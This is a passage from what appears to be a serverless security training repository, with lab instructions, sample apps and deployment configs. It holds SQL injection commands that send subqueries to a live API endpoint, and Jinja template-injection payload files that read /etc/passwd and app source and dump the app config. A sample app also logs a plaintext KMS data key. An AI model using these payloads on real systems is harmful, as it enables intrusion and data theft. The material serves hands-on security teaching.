[NodeJsScan](NodeJsScan/README.md) 40 | 41 | 42 | ##### Source Composition Analysis 43 | 44 | * [NPM AUDIT](Npm-Audit/README.md) 45 | 46 | * [Safety](Safety/README.md) 47 | 48 | 49 | ##### CTF 50 | -------------------------------------------------------------------------------- /Serverless/SQL Injection - FaaS/README.md: -------------------------------------------------------------------------------- 1 | ## SQL Injection - Event Injection 2 | 3 | This is a slightly unconventional SQL injection attack, in that it is triggered on an INSERT statement. 
4 | 5 | The SQLi is triggered by tampering with the "reading" value sent from the "sensor", which the function uses unsafely in its INSERT statement. 6 | 7 | You can leverage MySQL functions, global variables, etc. for the attack. 8 | 9 | * Run `http GET https://f20ymqtwal.execute-api.us-east-1.amazonaws.com/api/test_insert` 10 | * Run `http POST https://f20ymqtwal.execute-api.us-east-1.amazonaws.com/api/publish/testesh reading="(SELECT DATABASE())"` 11 | 12 | Substitute `(SELECT DATABASE())` with `(SELECT @@datadir)`, `(SELECT user())` or `(SELECT CURRENT_USER())` 13 | 14 | * Run `cd /root/DVFaaS-Damn-Vulnerable-Functions-as-a-Service/injection/mqtt_rds_sql_event_injection` 15 | * Run `cat app.py` 16 | 17 | Let's look at the code. -------------------------------------------------------------------------------- /Serverless/Safety/README.md: -------------------------------------------------------------------------------- 1 | # **`Safety - Python Source-Code-Analysis-Tool`** 2 | 3 | 4 | Step 1: Navigate to the directory (`~/serverless-training-apps`) that holds the Python virtual environment. 
5 | 6 | ```bash 7 | cd ~/serverless-training-apps 8 | ``` 9 | 10 | 11 | Step 2: Create and activate python-virtual environment by running `source venv/bin/activate` 12 | 13 | ```bash 14 | virtualenv venv 15 | 16 | source venv/bin/activate 17 | ``` 18 | 19 | 20 | Step 3: Install the necessary requirements 21 | 22 | ```bash 23 | pip install -r ~/serverless-training-apps/cv_uploader/cv-upload-handler/requirements.txt 24 | ``` 25 | 26 | 27 | Step 4: Run a scan on installed python libraries by running `safety check --json` 28 | 29 | ![](img/safety-4.png) 30 | 31 | -------------------------------------------------------------------------------- /Serverless/Safety/img/safety-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Safety/img/safety-1.png -------------------------------------------------------------------------------- /Serverless/Safety/img/safety-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Safety/img/safety-2.png -------------------------------------------------------------------------------- /Serverless/Safety/img/safety-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Safety/img/safety-3.png -------------------------------------------------------------------------------- /Serverless/Safety/img/safety-4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Safety/img/safety-4.png -------------------------------------------------------------------------------- 
/Serverless/Secrets-Management/README.md: -------------------------------------------------------------------------------- 1 | ## Serverless - Secrets Management 2 | 3 | ### Instructions 4 | 5 | > Before starting, make sure you have AWS credentials configured 6 | 7 | 8 | * Install pip3 9 | 10 | ```bash 11 | wget https://bootstrap.pypa.io/get-pip.py && python3 get-pip.py && rm get-pip.py 12 | ``` 13 | 14 | * Install Terraform: 15 | 16 | ``` 17 | wget https://releases.hashicorp.com/terraform/0.11.13/terraform_0.11.13_linux_amd64.zip && 18 | unzip terraform_0.11.13_linux_amd64.zip && 19 | mv terraform /usr/local/bin/ && 20 | rm terraform_0.11.13_linux_amd64.zip && 21 | terraform --version 22 | ``` 23 | 24 | * Install dependencies: 25 | * `cd /root/container_training/Serverless/Secrets-Management/ops` 26 | 27 | * `terraform init` 28 | * `terraform apply` 29 | 30 | * Select `us-west-2` when Terraform prompts for a region. Other regions are fine too, as long as the region is valid; note, however, that `training-secrets/app.py` creates its SSM client with `region_name='us-west-2'`, so the `we45-training-jwt-pass` parameter is looked up in that region regardless of the region you choose here. 31 | * If Terraform runs successfully, it generates a `config.json` 32 | * Now run `cd container_training/Serverless/Secrets-Management/training-secrets` 33 | * Run `mkdir -p .chalice` 34 | * Run `cp ../ops/config.json .chalice/` 35 | * Run `pip3 install chalice` 36 | * Run `pip3 install -r requirements.txt` 37 | * Run `chalice deploy`. 
This deploys the serverless function and generates the URL 38 | * Test url with `http POST https:///api/create-user email=` 39 | 40 | 41 | -------------------------------------------------------------------------------- /Serverless/Secrets-Management/ops/config.json.tpl: -------------------------------------------------------------------------------- 1 | { 2 | "version": "2.0", 3 | "app_name": "training-secrets", 4 | "stages": { 5 | "dev": { 6 | "api_gateway_stage": "api", 7 | "manage_iam_role": false, 8 | "iam_role_arn": "${ROLE_NAME}", 9 | "environment_variables": { 10 | "DB_TABLE": "${DB_TABLE}", 11 | "KEY_ID": "${KEY_ID}" 12 | } 13 | } 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /Serverless/Secrets-Management/training-secrets/.gitignore: -------------------------------------------------------------------------------- 1 | .chalice/deployments/ 2 | .chalice/venv/ 3 | -------------------------------------------------------------------------------- /Serverless/Secrets-Management/training-secrets/app.py: -------------------------------------------------------------------------------- 1 | from chalice import Chalice 2 | import boto3 3 | from os import environ 4 | from uuid import uuid4 5 | from os import urandom 6 | import base64 7 | 8 | ssm = boto3.client('ssm', region_name='us-west-2') 9 | client = boto3.client('kms') 10 | dynamo = boto3.resource('dynamodb') 11 | 12 | db = environ.get('DB_TABLE') 13 | kms_cmk = environ.get('KEY_ID') 14 | jwt_pwd = ssm.get_parameter(Name = 'we45-training-jwt-pass', WithDecryption = True)['Parameter']['Value'] 15 | 16 | pad = lambda s: s + (32 - len(s) % 32) * b' ' 17 | app = Chalice(app_name='training-secrets') 18 | 19 | 20 | def gen_key_seed(): 21 | data_key = client.generate_data_key( 22 | KeyId=kms_cmk, 23 | KeySpec="AES_256", 24 | ) 25 | ciphertext_blob = base64.b64encode(data_key.get('CiphertextBlob')).decode() 26 | plaintext_key = data_key.get('Plaintext') 27 | 
print("Plaintext key: {}".format(plaintext_key)) 28 | return ciphertext_blob 29 | 30 | 31 | @app.route('/create-user',methods = ['POST'], content_types=['application/json'], cors = True) 32 | def create_user(): 33 | jbody = app.current_request.json_body 34 | if isinstance(jbody, dict): 35 | if 'email' in jbody: 36 | table = dynamo.Table(db) 37 | key = gen_key_seed() 38 | table.put_item( 39 | Item={ 40 | 'email': jbody['email'], 41 | 'key': key 42 | } 43 | ) 44 | return {"success": "created user: {}".format(jbody['email'])} 45 | -------------------------------------------------------------------------------- /Serverless/Secrets-Management/training-secrets/requirements.txt: -------------------------------------------------------------------------------- 1 | boto3==1.9.120 2 | -------------------------------------------------------------------------------- /Serverless/Server-Side-Template-Injection/img/Open-Terminal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Server-Side-Template-Injection/img/Open-Terminal.png -------------------------------------------------------------------------------- /Serverless/Serverless-Attack/malicious-file.txt: -------------------------------------------------------------------------------- 1 | {{ config.items() }} 2 | -------------------------------------------------------------------------------- /Serverless/Serverless-Attack/read-etc-pwd.txt: -------------------------------------------------------------------------------- 1 | {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} 2 | -------------------------------------------------------------------------------- /Serverless/Serverless-Attack/read-py-files.txt: -------------------------------------------------------------------------------- 1 | {{ ''.__class__.__mro__[2].__subclasses__()[40]('app.py').read() }} 2 | 
-------------------------------------------------------------------------------- /Serverless/Serverless-Attack/readme.txt: -------------------------------------------------------------------------------- 1 | Trying Serverless Attack Lab!!! 2 | -------------------------------------------------------------------------------- /Serverless/insecure-deployment/.arc: -------------------------------------------------------------------------------- 1 | @app 2 | testapp 3 | 4 | @http 5 | get / -------------------------------------------------------------------------------- /Serverless/insecure-deployment/README.md: -------------------------------------------------------------------------------- 1 | ## Insecure Deployment - IAM Privileges 2 | 3 | 4 | * Run: `cd container_training/Serverless/insecure-deployment` 5 | 6 | * Run `npm install` 7 | 8 | * Run: `pip install awscli` if `aws-cli` is not installed already 9 | 10 | * Run: `aws configure` and configure the aws creds Access key ID and Secret (if not done already) 11 | 12 | * Run `npx deploy` 13 | 14 | * Now login to your AWS Console and examine the AWS Lambda deployment for this function 15 | -------------------------------------------------------------------------------- /Serverless/insecure-deployment/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "insecure-deployment", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "index.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1" 8 | }, 9 | "keywords": [], 10 | "author": "", 11 | "license": "ISC", 12 | "dependencies": { 13 | "@architect/architect": "^5.5.10" 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /Serverless/insecure-deployment/src/http/get-index/index.js: -------------------------------------------------------------------------------- 1 | // @architect/functions enables secure sessions, express-style middleware 
and more 2 | // let arc = require('@architect/functions') 3 | // let url = arc.http.helpers.url 4 | 5 | exports.handler = async function http(req) { 6 | console.log(req) 7 | return { 8 | type: 'text/html; charset=utf8', 9 | body: '

Hello world!

' 10 | } 11 | } 12 | 13 | // Example responses 14 | 15 | /* Forward requester to a new path 16 | exports.handler = async function http(request) { 17 | if (process.env.NODE_ENV !== 'production') { 18 | console.log(request) 19 | } 20 | return { 21 | status: 302, 22 | location: '/staging/about', 23 | } 24 | } 25 | */ 26 | 27 | /* Successful resource creation, CORS enabled 28 | exports.handler = async function http(request) { 29 | return { 30 | status: 201, 31 | type: 'application/json', 32 | body: JSON.stringify({ok: true}), 33 | cors: true, 34 | } 35 | } 36 | */ 37 | 38 | /* Deliver client-side JS 39 | exports.handler = async function http(request) { 40 | return { 41 | type: 'text/javascript', 42 | body: 'console.log("Hello world!")', 43 | } 44 | } 45 | */ 46 | 47 | // Learn more: https://arc.codes/guides/http 48 | -------------------------------------------------------------------------------- /Serverless/insecure-deployment/src/http/get-index/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "testapp-get-index", 3 | "dependencies": { 4 | "@architect/data": "^2.0.14", 5 | "@architect/functions": "^2.0.15" 6 | } 7 | } 8 | -------------------------------------------------------------------------------- /img/github.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/img/github.png -------------------------------------------------------------------------------- /img/twitter.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/img/twitter.png -------------------------------------------------------------------------------- /img/we45logo.jpg: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/img/we45logo.jpg --------------------------------------------------------------------------------